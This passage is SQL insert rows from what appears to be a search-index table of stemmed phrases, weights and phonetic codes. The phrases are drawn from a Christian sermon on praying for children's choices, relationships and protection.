(215400, 'he lost his', 'he lost his', 0, 1, 1.3667, 'H4232', 1, '*'),
(215401, 'he lost the', 'he lost the', 0, 1, 1.3667, 'H423', 1, '*'),
(215402, 'he started', 'he started', 0, 1, 1.3333, 'H2363', 1, '*'),
(215403, 'he started down', 'he started down', 0, 1, 1.5, 'H23635', 1, '*'),
(215404, 'head of', 'head of', 0, 1, 1.2333, 'H310', 1, '*'),
(215405, 'head of the', 'head of the', 0, 1, 1.3667, 'H313', 1, '*'),
(215406, 'help preserve', 'help preserve', 0, 1, 1.4333, 'H416261', 1, '*'),
(215407, 'help preserve your', 'help preserve your', 0, 1, 1.6, 'H4162616', 1, '*'),
(215408, 'his anointing', 'hi anointing', 0, 1, 1.4333, 'H25352', 1, '*'),
(215409, 'his anointing and', 'hi anointing and', 0, 1, 1.5667, 'H2535253', 1, '*'),
(215410, 'his eyes', 'hi eyes', 0, 1, 1.2667, 'H200', 1, '*'),
(215411, 'his eyes i', 'hi eyes i', 0, 1, 1.3333, 'H200', 1, '*'),
(215412, 'his hands pray', 'hi hands pray', 0, 1, 1.4667, 'H253216', 1, '*'),
(215413, 'his wife children', 'hi wife children', 0, 1, 1.5667, 'H2124365', 1, '*'),
(215414, 'how far', 'how far', 0, 1, 1.2333, 'H160', 1, '*'),
(215415, 'how far they', 'how far they', 0, 1, 1.4, 'H163', 1, '*'),
(215416, 'how many times', 'how many times', 0, 1, 1.4667, 'H5352', 1, '*'),
(215417, 'how they', 'how they', 0, 1, 1.2667, 'H300', 3, '*'),
(215418, 'how they turn', 'how they turn', 0, 1, 1.4333, 'H365', 1, '*'),
(215419, 'i e sodom', 'i e sodom', 0, 1, 1.3, 'I235', 1, '*'),
(215420, 'i have found', 'i have found', 0, 1, 1.4, 'I153', 1, '*'),
(215421, 'if it', 'if it', 0, 1, 1.1667, 'I130', 2, '*'),
(215422, 'if it is', 'if it is', 0, 1, 1.2667, 'I132', 1, '*'),
(215423, 'if their', 'if their', 0, 1, 1.2667, 'I136', 1, '*'),
(215424, 'if their aunt', 'if their aunt', 0, 1, 1.4333, 'I13653', 1, '*'),
(215425, 'if they', 'if they', 0, 1, 1.2333, 'I130', 2, '*'),
(215426, 'if they are', 'if they are', 0, 1, 1.3667, 'I136', 2, '*'),
(215427, 'if you commit', 'if you commit', 0, 1, 1.4333, 'I1253', 1, '*'),
(215428, 'important prayer', 'import prayer', 0, 1, 1.5333, 'I51635316', 1, '*'),
(215429, 'important prayer for', 'import prayer for', 0, 1, 1.6667, 'I5163531616', 1, '*'),
(215430, 'important that', 'import that', 0, 1, 1.4667, 'I516353', 2, '*'),
(215431, 'important that will', 'import that will', 0, 1, 1.6333, 'I5163534', 1, '*'),
(215432, 'in 1 samuel', 'in 1 samuel', 0, 1, 1.3667, 'I5254', 1, '*'),
(215433, 'in black', 'in black', 0, 1, 1.2667, 'I5142', 1, '*'),
(215434, 'in black and', 'in black and', 0, 1, 1.4, 'I514253', 1, '*'),
(215435, 'in charge', 'in charge', 0, 1, 1.3, 'I5262', 1, '*'),
(215436, 'in charge of', 'in charge of', 0, 1, 1.4, 'I52621', 1, '*'),
(215437, 'in life choices', 'in life choices', 0, 1, 1.5, 'I5412', 1, '*'),
(215438, 'in life pray', 'in life pray', 0, 1, 1.4, 'I5416', 1, '*'),
(215439, 'in life ps', 'in life ps', 0, 1, 1.3333, 'I5412', 1, '*'),
(215440, 'in life regardless', 'in life regardless', 0, 1, 1.6, 'I541626342', 1, '*'),
(215441, 'in marital choice', 'in marital choice', 0, 1, 1.5667, 'I56342', 1, '*'),
(215442, 'in south', 'in south', 0, 1, 1.2667, 'I523', 1, '*'),
(215443, 'in south west', 'in south west', 0, 1, 1.4333, 'I52323', 1, '*'),
(215444, 'in submitting', 'in submitting', 0, 1, 1.4333, 'I5215352', 1, '*'),
(215445, 'in submitting an', 'in submitting an', 0, 1, 1.5333, 'I52153525', 1, '*'),
(215446, 'in the purpose', 'in the purpose', 0, 1, 1.4667, 'I531612', 1, '*'),
(215447, 'in those people', 'in those people', 0, 1, 1.5, 'I53214', 1, '*'),
(215448, 'in your child', 'in your child', 0, 1, 1.4333, 'I56243', 1, '*'),
(215449, 'in your children', 'in your children', 0, 1, 1.5333, 'I5624365', 1, '*'),
(215450, 'in your family', 'in your family', 0, 1, 1.4667, 'I56154', 1, '*'),
(215451, 'in your lineage', 'in your lineage', 0, 1, 1.5, 'I56452', 1, '*'),
(215452, 'inheritance', 'inherit', 0, 0, 0.7333, 'I56352', 1, '*'),
(215453, 'inheritance you', 'inherit you', 0, 1, 1.5, 'I56352', 1, '*'),
(215454, 'inheritance you can', 'inherit you can', 0, 1, 1.6333, 'I563525', 1, '*'),
(215455, 'instructions but', 'instruct but', 0, 1, 1.5333, 'I5236235213', 1, '*'),
(215456, 'instructions but the', 'instruct but the', 0, 1, 1.6667, 'I5236235213', 1, '*'),
(215457, 'into the life', 'into the life', 0, 1, 1.4333, 'I5341', 1, '*'),
(215458, 'is a saying', 'is a saying', 0, 1, 1.3667, 'I252', 1, '*'),
(215459, 'is determined', 'is determined', 0, 1, 1.4333, 'I23653', 1, '*'),
(215460, 'is determined by', 'is determined by', 0, 1, 1.5333, 'I236531', 1, '*'),
(215461, 'is jesus', 'is jesus', 0, 1, 1.2667, 'I200', 1, '*'),
(215462, 'is jesus christ', 'is jesus christ', 0, 1, 1.5, 'I2623', 1, '*'),
(215463, 'is not how', 'is not how', 0, 1, 1.3333, 'I253', 1, '*'),
(215464, 'is not only', 'is not only', 0, 1, 1.3667, 'I25354', 1, '*'),
(215465, 'is the ability', 'is the ability', 0, 1, 1.4667, 'I23143', 2, '*'),
(215466, 'is the arrow', 'is the arrow', 0, 1, 1.4, 'I236', 1, '*'),
(215467, 'is the greatest', 'is the greatest', 0, 1, 1.5, 'I2326323', 1, '*'),
(215468, 'is to have', 'is to have', 0, 1, 1.3333, 'I231', 1, '*'),
(215469, 'is wrong', 'is wrong', 0, 1, 1.2667, 'I2652', 1, '*'),
(215470, 'is wrong the', 'is wrong the', 0, 1, 1.4, 'I26523', 1, '*'),
(215471, 'issues they', 'issu they', 0, 1, 1.3667, 'I230', 1, '*'),
(215472, 'issues they are', 'issu they are', 0, 1, 1.5, 'I236', 1, '*'),
(215473, 'it can scatter', 'it can scatter', 0, 1, 1.4667, 'I325236', 1, '*'),
(215474, 'it in marital', 'it in marital', 0, 1, 1.4333, 'I35634', 1, '*'),
(215475, 'it is jesus', 'it is jesus', 0, 1, 1.3667, 'I320', 1, '*'),
(215476, 'it takes to', 'it takes to', 0, 1, 1.3667, 'I323', 1, '*'),
(215477, 'item 35', 'item 35', 0, 1, 1.2333, 'I350', 1, '*'),
(215478, 'item 35 seven', 'item 35 seven', 0, 1, 1.4333, 'I35215', 1, '*'),
(215479, 'jesus christ that', 'jesu christ that', 0, 1, 1.5667, 'J623', 1, '*'),
(215480, 'jesus over', 'jesu over', 0, 1, 1.3333, 'J160', 1, '*'),
(215481, 'jesus over their', 'jesu over their', 0, 1, 1.5333, 'J1636', 1, '*'),
(215482, 'jesus will', 'jesu will', 0, 1, 1.3333, 'J400', 1, '*'),
(215483, 'jesus will determine', 'jesu will determine', 0, 1, 1.6667, 'J4365', 1, '*'),
(215484, 'journey and they', 'journei and they', 0, 1, 1.5333, 'J653', 1, '*'),
(215485, 'judge and', 'judg and', 0, 1, 1.3, 'J3253', 1, '*'),
(215486, 'judge and discern', 'judg and discern', 0, 1, 1.5667, 'J3253265', 1, '*'),
(215487, 'judgment pray', 'judgment pray', 0, 1, 1.4333, 'J325316', 1, '*'),
(215488, 'judgment pray for', 'judgment pray for', 0, 1, 1.5667, 'J32531616', 1, '*'),
(215489, 'k2 item 35', 'k2 item 35', 0, 1, 1.3333, 'K350', 1, '*'),
(215490, 'know those', 'know those', 0, 1, 1.3333, 'K532', 1, '*'),
(215491, 'know those people', 'know those people', 0, 1, 1.5667, 'K53214', 1, '*'),
(215492, 'laboured', 'labour', 0, 0, 0.5333, 'L163', 1, '*'),
(215493, 'laboured for', 'labour for', 0, 1, 1.4, 'L16316', 1, '*'),
(215494, 'laboured for in', 'labour for in', 0, 1, 1.5, 'L163165', 1, '*'),
(215495, 'lastly pray', 'lastli pray', 0, 1, 1.3667, 'L23416', 1, '*'),
(215496, 'lastly pray ps', 'lastli pray ps', 0, 1, 1.4667, 'L2341612', 1, '*'),
(215497, 'late in', 'late in', 0, 1, 1.2333, 'L350', 1, '*'),
(215498, 'late in submitting', 'late in submitting', 0, 1, 1.6, 'L35215352', 1, '*'),
(215499, 'leave for', 'leav for', 0, 1, 1.3, 'L160', 1, '*'),
(215500, 'leave for your', 'leav for your', 0, 1, 1.4667, 'L160', 1, '*'),
(215501, 'life a', 'life a', 0, 1, 1.2, 'L100', 1, '*'),
(215502, 'life a sound', 'life a sound', 0, 1, 1.4, 'L1253', 1, '*'),
(215503, 'life and experiences', 'life and experiences', 0, 1, 1.6667, 'L15321652', 1, '*'),
(215504, 'life as their', 'life as their', 0, 1, 1.4333, 'L1236', 1, '*'),
(215505, 'life choices', 'life choices', 0, 1, 1.4, 'L120', 1, '*'),
(215506, 'life choices about', 'life choices about', 0, 1, 1.6, 'L1213', 1, '*'),
(215507, 'life from', 'life from', 0, 1, 1.3, 'L165', 1, '*'),
(215508, 'life from when', 'life from when', 0, 1, 1.4667, 'L165', 1, '*'),
(215509, 'life pray', 'life pray', 0, 1, 1.3, 'L160', 1, '*'),
(215510, 'life pray that', 'life pray that', 0, 1, 1.4667, 'L163', 1, '*'),
(215511, 'life ps', 'life ps', 0, 1, 1.2333, 'L120', 1, '*'),
(215512, 'life ps 46', 'life ps 46', 0, 1, 1.3333, 'L120', 1, '*'),
(215513, 'life regardless', 'life regardless', 0, 1, 1.5, 'L1626342', 1, '*'),
(215514, 'life regardless of', 'life regardless of', 0, 1, 1.6, 'L16263421', 1, '*'),
(215515, 'life they will', 'life they will', 0, 1, 1.4667, 'L134', 1, '*'),
(215516, 'like you', 'like you', 0, 1, 1.2667, 'L200', 3, '*'),
(215517, 'like you will', 'like you will', 0, 1, 1.4333, 'L240', 1, '*'),
(215518, 'lineage', 'lineag', 0, 0, 0.4667, 'L520', 1, '*'),
(215519, 'lineage and', 'lineag and', 0, 1, 1.3667, 'L5253', 1, '*'),
(215520, 'lineage and you', 'lineag and you', 0, 1, 1.5, 'L5253', 1, '*'),
(215521, 'lines', 'line', 0, 0, 0.3333, 'L520', 1, '*'),
(215522, 'lines that', 'line that', 0, 1, 1.3333, 'L523', 1, '*'),
(215523, 'lines that are', 'line that are', 0, 1, 1.4667, 'L5236', 1, '*'),
(215524, 'lives and', 'live and', 0, 1, 1.3, 'L1253', 1, '*'),
(215525, 'lives and experiences', 'live and experiences', 0, 1, 1.7, 'L125321652', 1, '*'),
(215526, 'lives if', 'live if', 0, 1, 1.2667, 'L121', 1, '*'),
(215527, 'lives if it', 'live if it', 0, 1, 1.3667, 'L1213', 1, '*'),
(215528, 'lives is', 'live is', 0, 1, 1.2667, 'L120', 1, '*'),
(215529, 'lives is determined', 'live is determined', 0, 1, 1.6333, 'L123653', 1, '*'),
(215530, 'lives they', 'live they', 0, 1, 1.3333, 'L123', 3, '*'),
(215531, 'lives they will', 'live they will', 0, 1, 1.5, 'L1234', 1, '*'),
(215532, 'location career', 'locat career', 0, 1, 1.5, 'L23526', 1, '*'),
(215533, 'location career and', 'locat career and', 0, 1, 1.6333, 'L2352653', 1, '*'),
(215534, 'lord of', 'lord of', 0, 1, 1.2333, 'L631', 1, '*'),
(215535, 'lord of their', 'lord of their', 0, 1, 1.4333, 'L63136', 1, '*'),
(215536, 'lord will not', 'lord will not', 0, 1, 1.4333, 'L63453', 1, '*'),
(215537, 'lost his', 'lost his', 0, 1, 1.2667, 'L232', 1, '*'),
(215538, 'lost his anointing', 'lost his anointing', 0, 1, 1.6, 'L2325352', 1, '*'),
(215539, 'lost the future', 'lost the future', 0, 1, 1.5, 'L23136', 1, '*'),
(215540, 'lot chose', 'lot chose', 0, 1, 1.3, 'L320', 1, '*'),
(215541, 'lot chose what', 'lot chose what', 0, 1, 1.4667, 'L323', 1, '*'),
(215542, 'make right', 'make right', 0, 1, 1.3333, 'M2623', 1, '*'),
(215543, 'make right choices', 'make right choices', 0, 1, 1.6, 'M26232', 1, '*'),
(215544, 'make these', 'make these', 0, 1, 1.3333, 'M232', 1, '*'),
(215545, 'make these choices', 'make these choices', 0, 1, 1.6, 'M232', 1, '*'),
(215546, 'many times you', 'mani times you', 0, 1, 1.4667, 'M352', 1, '*'),
(215547, 'marital choice', 'marit choice', 0, 1, 1.4667, 'M6342', 1, '*'),
(215548, 'marital choice and', 'marit choice and', 0, 1, 1.6, 'M634253', 1, '*'),
(215549, 'marriage pray', 'marriag pray', 0, 1, 1.4333, 'M6216', 1, '*'),
(215550, 'marriage pray that', 'marriag pray that', 0, 1, 1.6, 'M62163', 1, '*'),
(215551, 'may want', 'mai want', 0, 1, 1.2667, 'M300', 1, '*'),
(215552, 'may want to', 'mai want to', 0, 1, 1.3667, 'M300', 1, '*'),
(215553, 'may you never', 'mai you never', 0, 1, 1.4333, 'M160', 1, '*'),
(215554, 'meet and', 'meet and', 0, 1, 1.2667, 'M353', 1, '*'),
(215555, 'meet and that', 'meet and that', 0, 1, 1.4333, 'M353', 1, '*'),
(215556, 'missed it', 'miss it', 0, 1, 1.3, 'M230', 2, '*'),
(215557, 'missed it in', 'miss it in', 0, 1, 1.4, 'M235', 1, '*'),
(215558, 'more pray', 'more pray', 0, 1, 1.3, 'M616', 1, '*'),
(215559, 'more pray for', 'more pray for', 0, 1, 1.4333, 'M61616', 1, '*'),
(215560, 'must actively pray', 'must actively pray', 0, 1, 1.6, 'M23231416', 1, '*'),
(215561, 'must know those', 'must know those', 0, 1, 1.5, 'M232532', 1, '*'),
(215562, 'must start', 'must start', 0, 1, 1.3333, 'M232363', 1, '*'),
(215563, 'must start that', 'must start that', 0, 1, 1.5, 'M232363', 1, '*'),
(215564, 'nb', 'nb', 0, 0, 0.1333, 'N100', 1, '*'),
(215565, 'nb get', 'nb get', 0, 1, 1.2, 'N123', 1, '*'),
(215566, 'nb get the', 'nb get the', 0, 1, 1.3333, 'N123', 1, '*'),
(215567, 'need favour', 'need favour', 0, 1, 1.3667, 'N316', 1, '*'),
(215568, 'need favour because', 'need favour because', 0, 1, 1.6333, 'N31612', 1, '*'),
(215569, 'needs to have', 'need to have', 0, 1, 1.4333, 'N3231', 1, '*'),
(215570, 'negative ancestral', 'neg ancestral', 0, 1, 1.6, 'N23152364', 1, '*'),
(215571, 'negative ancestral flow', 'neg ancestral flow', 0, 1, 1.7667, 'N2315236414', 1, '*'),
(215572, 'negative ancestral flows', 'neg ancestral flows', 0, 1, 1.8, 'N23152364142', 1, '*'),
(215573, 'negative female', 'neg female', 0, 1, 1.5, 'N23154', 1, '*'),
(215574, 'negative female ancestral', 'neg female ancestral', 0, 1, 1.8333, 'N2315452364', 1, '*'),
(215575, 'never get', 'never get', 0, 1, 1.3, 'N1623', 1, '*'),
(215576, 'never get there', 'never get there', 0, 1, 1.5, 'N16236', 1, '*'),
(215577, 'nigeria', 'nigeria', 0, 0, 0.4667, 'N260', 2, '*'),
(215578, 'nigeria that', 'nigeria that', 0, 1, 1.4, 'N263', 1, '*'),
(215579, 'nigeria that where', 'nigeria that where', 0, 1, 1.6, 'N2636', 1, '*'),
(215580, 'no negative', 'no negative', 0, 1, 1.3667, 'N231', 1, '*'),
(215581, 'no negative ancestral', 'no negative ancestral', 0, 1, 1.7, 'N23152364', 1, '*'),
(215582, 'not any', 'not any', 0, 1, 1.2333, 'N350', 1, '*'),
(215583, 'not any negative', 'not any negative', 0, 1, 1.5333, 'N35231', 1, '*'),
(215584, 'not clearly', 'not clearly', 0, 1, 1.3667, 'N32464', 1, '*'),
(215585, 'not clearly written', 'not clearly written', 0, 1, 1.6333, 'N32464635', 1, '*'),
(215586, 'not determine', 'not determine', 0, 1, 1.4333, 'N365', 1, '*'),
(215587, 'not determine your', 'not determine your', 0, 1, 1.6, 'N3656', 1, '*'),
(215588, 'not doing anything', 'not doing anything', 0, 1, 1.6, 'N3525352', 1, '*'),
(215589, 'not how many', 'not how many', 0, 1, 1.4, 'N350', 1, '*'),
(215590, 'not only should', 'not only should', 0, 1, 1.5, 'N354243', 1, '*'),
(215591, 'not only the', 'not only the', 0, 1, 1.4, 'N3543', 1, '*'),
(215592, 'not reach', 'not reach', 0, 1, 1.3, 'N362', 1, '*'),
(215593, 'not reach may', 'not reach may', 0, 1, 1.4333, 'N3625', 1, '*'),
(215594, 'nursing', 'nurs', 0, 0, 0.4667, 'N6252', 1, '*'),
(215595, 'nursing mother', 'nurs mother', 0, 1, 1.4667, 'N6252536', 1, '*'),
(215596, 'of 20', 'of 20', 0, 1, 1.1667, 'O100', 1, '*'),
(215597, 'of 20 can', 'of 20 can', 0, 1, 1.3, 'O125', 1, '*'),
(215598, 'of a school', 'of a school', 0, 1, 1.3667, 'O124', 1, '*'),
(215599, 'of eli', 'of eli', 0, 1, 1.2, 'O140', 1, '*'),
(215600, 'of eli in', 'of eli in', 0, 1, 1.3, 'O145', 1, '*'),
(215601, 'of favour', 'of favour', 0, 1, 1.3, 'O160', 1, '*'),
(215602, 'of favour will', 'of favour will', 0, 1, 1.4667, 'O164', 1, '*'),
(215603, 'of how', 'of how', 0, 1, 1.2, 'O100', 2, '*'),
(215604, 'of how they', 'of how they', 0, 1, 1.3667, 'O130', 1, '*'),
(215605, 'of jesus over', 'of jesus over', 0, 1, 1.4333, 'O1216', 1, '*'),
(215606, 'of jesus will', 'of jesus will', 0, 1, 1.4333, 'O124', 1, '*'),
(215607, 'of the negative', 'of the negative', 0, 1, 1.5, 'O135231', 1, '*'),
(215608, 'of their lives', 'of their lives', 0, 1, 1.4667, 'O136412', 1, '*'),
(215609, 'of whether', 'of whether', 0, 1, 1.3333, 'O136', 1, '*'),
(215610, 'of whether they', 'of whether they', 0, 1, 1.5, 'O1363', 1, '*'),
(215611, 'of your children', 'of your children', 0, 1, 1.5333, 'O1624365', 1, '*'),
(215612, 'old or', 'old or', 0, 1, 1.2, 'O436', 1, '*'),
(215613, 'old or young', 'old or young', 0, 1, 1.4, 'O43652', 1, '*'),
(215614, 'olusola ayodele areogun', 'olusola ayodele areogun', 0, 1, 1.7667, 'O42434625', 25, '*'),
(215615, 'on their journey', 'on their journey', 0, 1, 1.5333, 'O536265', 1, '*'),
(215616, 'one bad', 'on bad', 0, 1, 1.2333, 'O513', 1, '*'),
(215617, 'one bad relationship', 'on bad relationship', 0, 1, 1.6667, 'O513643521', 1, '*'),
(215618, 'only should', 'onli should', 0, 1, 1.3667, 'O54243', 1, '*'),
(215619, 'only should you', 'onli should you', 0, 1, 1.5, 'O54243', 1, '*'),
(215620, 'only the instructions', 'onli the instructions', 0, 1, 1.7, 'O54352362352', 1, '*'),
(215621, 'or effort', 'or effort', 0, 1, 1.3, 'O6163', 1, '*'),
(215622, 'or effort will', 'or effort will', 0, 1, 1.4667, 'O61634', 1, '*'),
(215623, 'or else', 'or else', 0, 1, 1.2333, 'O642', 1, '*'),
(215624, 'or else the', 'or else the', 0, 1, 1.3667, 'O6423', 1, '*'),
(215625, 'or even better', 'or even better', 0, 1, 1.4667, 'O615136', 1, '*'),
(215626, 'or even more', 'or even more', 0, 1, 1.4, 'O6156', 1, '*'),
(215627, 'or young', 'or young', 0, 1, 1.2667, 'O652', 1, '*'),
(215628, 'ordained for their', 'ordain for their', 0, 1, 1.6, 'O63531636', 1, '*'),
(215629, 'other children delay', 'other children delay', 0, 1, 1.6667, 'O362436534', 1, '*'),
(215630, 'our children', 'our children', 0, 1, 1.4, 'O624365', 1, '*'),
(215631, 'our children with', 'our children with', 0, 1, 1.5667, 'O6243653', 1, '*'),
(215632, 'out according', 'out according', 0, 1, 1.4333, 'O326352', 1, '*'),
(215633, 'out according to', 'out according to', 0, 1, 1.5333, 'O3263523', 1, '*'),
(215634, 'out of 20', 'out of 20', 0, 1, 1.3, 'O310', 1, '*'),
(215635, 'out remember', 'out remember', 0, 1, 1.4, 'O36516', 1, '*'),
(215636, 'out remember the', 'out remember the', 0, 1, 1.5333, 'O365163', 1, '*'),
(215637, 'over their', 'over their', 0, 1, 1.3333, 'O1636', 1, '*'),
(215638, 'over their lives', 'over their lives', 0, 1, 1.5333, 'O1636412', 1, '*'),
(215639, 'over your children', 'over your children', 0, 1, 1.6, 'O1624365', 1, '*'),
(215640, 'own child', 'own child', 0, 1, 1.3, 'O5243', 1, '*'),
(215641, 'own child was', 'own child was', 0, 1, 1.4333, 'O52432', 1, '*'),
(215642, 'parents remember', 'parent remember', 0, 1, 1.5333, 'P65326516', 1, '*'),
(215643, 'parents remember that', 'parent remember that', 0, 1, 1.7, 'P653265163', 1, '*'),
(215644, 'people and', 'peopl and', 0, 1, 1.3333, 'P453', 4, '*'),
(215645, 'people and prevent', 'peopl and prevent', 0, 1, 1.6, 'P45316153', 1, '*'),
(215646, 'people in your', 'peopl in your', 0, 1, 1.4667, 'P456', 1, '*'),
(215647, 'people not', 'peopl not', 0, 1, 1.3333, 'P453', 1, '*'),
(215648, 'people not only', 'peopl not only', 0, 1, 1.5, 'P45354', 1, '*'),
(215649, 'people they', 'peopl they', 0, 1, 1.3667, 'P430', 1, '*'),
(215650, 'people they will', 'peopl they will', 0, 1, 1.5333, 'P434', 1, '*'),
(215651, 'philosophy', 'philosophi', 0, 0, 0.6667, 'P421', 1, '*'),
(215652, 'philosophy is', 'philosophi is', 0, 1, 1.4333, 'P4212', 1, '*'),
(215653, 'philosophy is not', 'philosophi is not', 0, 1, 1.5667, 'P421253', 1, '*'),
(215654, 'placed on their', 'place on their', 0, 1, 1.5, 'P423536', 1, '*'),
(215655, 'plan for a', 'plan for a', 0, 1, 1.3333, 'P4516', 1, '*'),
(215656, 'plan for your', 'plan for your', 0, 1, 1.4333, 'P4516', 3, '*'),
(215657, 'plan or', 'plan or', 0, 1, 1.2333, 'P456', 1, '*'),
(215658, 'plan or else', 'plan or else', 0, 1, 1.4, 'P45642', 1, '*'),
(215659, 'plead', 'plead', 0, 0, 0.3333, 'P430', 1, '*'),
(215660, 'plead the', 'plead the', 0, 1, 1.3, 'P430', 1, '*'),
(215661, 'plead the blood', 'plead the blood', 0, 1, 1.5, 'P43143', 1, '*'),
(215662, 'points that', 'point that', 0, 1, 1.3667, 'P5323', 1, '*'),
(215663, 'points that i', 'point that i', 0, 1, 1.4333, 'P5323', 1, '*'),
(215664, 'pray against', 'prai against', 0, 1, 1.4, 'P62523', 1, '*'),
(215665, 'pray against negative', 'prai against negative', 0, 1, 1.7, 'P625235231', 1, '*'),
(215666, 'pray for protection', 'prai for protection', 0, 1, 1.6333, 'P616163235', 1, '*'),
(215667, 'pray for them', 'prai for them', 0, 1, 1.4333, 'P61635', 1, '*'),
(215668, 'pray ps 91', 'prai ps 91', 0, 1, 1.3333, 'P612', 1, '*'),
(215669, 'pray that a', 'prai that a', 0, 1, 1.3667, 'P630', 1, '*'),
(215670, 'pray that no', 'prai that no', 0, 1, 1.4, 'P635', 1, '*'),
(215671, 'pray that somebody', 'prai that somebody', 0, 1, 1.6, 'P632513', 1, '*'),
(215672, 'pray that when', 'prai that when', 0, 1, 1.4667, 'P635', 1, '*'),
(215673, 'prayer by', 'prayer by', 0, 1, 1.3, 'P610', 1, '*'),
(215674, 'prayer by refusing', 'prayer by refusing', 0, 1, 1.6, 'P6161252', 1, '*'),
(215675, 'prayer for children', 'prayer for children', 0, 1, 1.6333, 'P61624365', 1, '*'),
(215676, 'prayer points', 'prayer points', 0, 1, 1.4333, 'P61532', 3, '*'),
(215677, 'prayer points that', 'prayer points that', 0, 1, 1.6, 'P615323', 1, '*'),
(215678, 'prayer your', 'prayer your', 0, 1, 1.3667, 'P600', 1, '*'),
(215679, 'prayer your children', 'prayer your children', 0, 1, 1.6667, 'P624365', 1, '*'),
(215680, 'prayers for victorious', 'prayer for victorious', 0, 1, 1.7333, 'P621612362', 1, '*'),
(215681, 'prayers lastly', 'prayer lastly', 0, 1, 1.4667, 'P624234', 1, '*'),
(215682, 'prayers lastly pray', 'prayer lastly pray', 0, 1, 1.6333, 'P62423416', 1, '*'),
(215683, 'preserve', 'preserv', 0, 0, 0.5333, 'P6261', 1, '*'),
(215684, 'preserve your', 'preserv your', 0, 1, 1.4333, 'P62616', 1, '*'),
(215685, 'preserve your children', 'preserv your children', 0, 1, 1.7333, 'P6261624365', 1, '*'),
(215686, 'prevent your', 'prevent your', 0, 1, 1.4, 'P61536', 1, '*'),
(215687, 'prevent your children', 'prevent your children', 0, 1, 1.7, 'P6153624365', 1, '*'),
(215688, 'principal', 'princip', 0, 0, 0.6, 'P65214', 1, '*'),
(215689, 'principal of', 'princip of', 0, 1, 1.4, 'P652141', 1, '*'),
(215690, 'principal of a', 'princip of a', 0, 1, 1.4667, 'P652141', 1, '*'),
(215691, 'protection for', 'protect for', 0, 1, 1.4667, 'P6323516', 1, '*'),
(215692, 'protection for them', 'protect for them', 0, 1, 1.6333, 'P632351635', 1, '*'),
(215693, 'protection in', 'protect in', 0, 1, 1.4333, 'P63235', 1, '*'),
(215694, 'protection in life', 'protect in life', 0, 1, 1.6, 'P6323541', 1, '*'),
(215695, 'protection is', 'protect is', 0, 1, 1.4333, 'P632352', 1, '*'),
(215696, 'protection is a', 'protect is a', 0, 1, 1.5, 'P632352', 1, '*'),
(215697, 'ps 46', 'ps 46', 0, 1, 1.1667, 'P200', 1, '*'),
(215698, 'ps 46 7', 'ps 46 7', 0, 1, 1.2333, 'P200', 1, '*'),
(215699, 'ps 91', 'ps 91', 0, 1, 1.1667, 'P200', 1, '*'),
(215700, 'ps 91 and', 'ps 91 and', 0, 1, 1.3, 'P253', 1, '*'),
(215701, 'ps 91 there', 'ps 91 there', 0, 1, 1.3667, 'P236', 1, '*'),
(215702, 'psalms', 'psalm', 0, 0, 0.4, 'P2452', 1, '*'),
(215703, 'psalms 46', 'psalm 46', 0, 1, 1.3, 'P2452', 1, '*'),
(215704, 'psalms 46 7', 'psalm 46 7', 0, 1, 1.3667, 'P2452', 1, '*'),
(215705, 'purpose of', 'purpos of', 0, 1, 1.3333, 'P6121', 3, '*'),
(215706, 'purpose of god', 'purpos of god', 0, 1, 1.4667, 'P612123', 3, '*'),
(215707, 'reach may', 'reach may', 0, 1, 1.3, 'R250', 1, '*'),
(215708, 'reach may you', 'reach may you', 0, 1, 1.4333, 'R250', 1, '*'),
(215709, 'refusing', 'refus', 0, 0, 0.5333, 'R1252', 1, '*'),
(215710, 'refusing those', 'refus those', 0, 1, 1.4667, 'R125232', 1, '*'),
(215711, 'refusing those flows', 'refus those flows', 0, 1, 1.6667, 'R125232142', 1, '*'),
(215712, 'regardless', 'regardless', 0, 0, 0.6667, 'R26342', 1, '*'),
(215713, 'regardless of', 'regardless of', 0, 1, 1.4333, 'R263421', 1, '*'),
(215714, 'regardless of whether', 'regardless of whether', 0, 1, 1.7, 'R26342136', 1, '*'),
(215715, 'relationship it', 'relationship it', 0, 1, 1.5, 'R435213', 1, '*'),
(215716, 'relationship it can', 'relationship it can', 0, 1, 1.6333, 'R43521325', 1, '*'),
(215717, 'relationship out', 'relationship out', 0, 1, 1.5333, 'R435213', 1, '*'),
(215718, 'relationship out of', 'relationship out of', 0, 1, 1.6333, 'R4352131', 1, '*'),
(215719, 'relationships but', 'relationship but', 0, 1, 1.5667, 'R43521213', 1, '*'),
(215720, 'relationships but you', 'relationship but you', 0, 1, 1.7, 'R43521213', 1, '*'),
(215721, 'relationships one', 'relationship one', 0, 1, 1.5667, 'R4352125', 1, '*'),
(215722, 'relationships one bad', 'relationship one bad', 0, 1, 1.7, 'R435212513', 1, '*'),
(215723, 'relationships that', 'relationship that', 0, 1, 1.6, 'R4352123', 1, '*'),
(215724, 'relationships that god', 'relationship that god', 0, 1, 1.7333, 'R435212323', 1, '*'),
(215725, 'relationships that the', 'relationship that the', 0, 1, 1.7333, 'R4352123', 1, '*'),
(215726, 'remember the', 'rememb the', 0, 1, 1.4, 'R5163', 3, '*'),
(215727, 'remember the children', 'rememb the children', 0, 1, 1.7, 'R516324365', 1, '*'),
(215728, 'replace', 'replac', 0, 0, 0.4667, 'R142', 1, '*'),
(215729, 'replace family', 'replac family', 0, 1, 1.4667, 'R142154', 1, '*'),
(215730, 'replace family relationships', 'replac family relationships', 0, 1, 1.9333, 'R1421546435212', 1, '*'),
(215731, 'results in', 'result in', 0, 1, 1.3333, 'R24325', 1, '*'),
(215732, 'results in life', 'result in life', 0, 1, 1.5, 'R2432541', 1, '*'),
(215733, 'right and what', 'right and what', 0, 1, 1.4667, 'R2353', 1, '*'),
(215734, 'right and wrong', 'right and wrong', 0, 1, 1.5, 'R2353652', 1, '*'),
(215735, 'right choices', 'right choices', 0, 1, 1.4333, 'R232', 1, '*'),
(215736, 'right choices in', 'right choices in', 0, 1, 1.5333, 'R2325', 1, '*'),
(215737, 'right relationships', 'right relationships', 0, 1, 1.6333, 'R236435212', 1, '*'),
(215738, 'right relationships one', 'right relationships one', 0, 1, 1.7667, 'R2364352125', 1, '*'),
(215739, 'right relationships that', 'right relationships that', 0, 1, 1.8, 'R2364352123', 1, '*'),
(215740, 'right samson', 'right samson', 0, 1, 1.4, 'R232525', 1, '*'),
(215741, 'right samson missed', 'right samson missed', 0, 1, 1.6333, 'R23252523', 1, '*'),
(215742, 'road where', 'road where', 0, 1, 1.3333, 'R360', 1, '*'),
(215743, 'road where he', 'road where he', 0, 1, 1.4333, 'R360', 1, '*'),
(215744, 'samson missed', 'samson missed', 0, 1, 1.4333, 'S52523', 1, '*'),
